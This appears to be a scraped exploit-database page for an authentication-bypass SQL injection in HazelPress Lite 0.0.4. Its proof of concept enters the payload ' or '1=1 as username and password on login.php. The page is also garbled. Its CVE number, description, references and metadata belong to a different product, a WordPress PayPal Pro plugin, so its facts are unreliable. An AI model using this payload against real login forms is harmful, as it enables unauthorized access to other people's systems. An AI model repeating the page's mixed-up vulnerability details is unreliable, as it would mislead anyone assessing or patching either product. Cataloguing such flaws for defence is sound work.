header-logo
Suggest Exploit
vendor:
HazelPress Lite
by:
cr4wl3r
9,8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: HazelPress Lite
Affected Version From: 0.0.4
Affected Version To: 0.0.4
Patch Exists: YES
Related CWE: CVE-2020-14092
CPE: a:hazelpress:hazelpress_lite
Metasploit: N/A
Other Scripts: N/A
Tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://wpscan.com/vulnerability/10287https://wordpress.dwbooster.com/forms/payment-form-for-paypal-prohttps://nvd.nist.gov/vuln/detail/CVE-2020-14092https://wordpress.org/plugins/payment-form-for-paypal-pro/#developershttps://wpvulndb.com/vulnerabilities/10287
Nuclei Metadata: {'max-request': 1, 'framework': 'wordpress', 'vendor': 'ithemes', 'product': 'paypal_pro'}
Platforms Tested: None
2020

HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability

WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.

Mitigation:

Upgrade to the latest version of HazelPress Lite.
Source

Exploit-DB raw data:

# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads

# PoC: [path]/login.php

# Username: ' or '1=1
# password: ' or '1=1

Navigation

Suggest Exploit

Services By CQR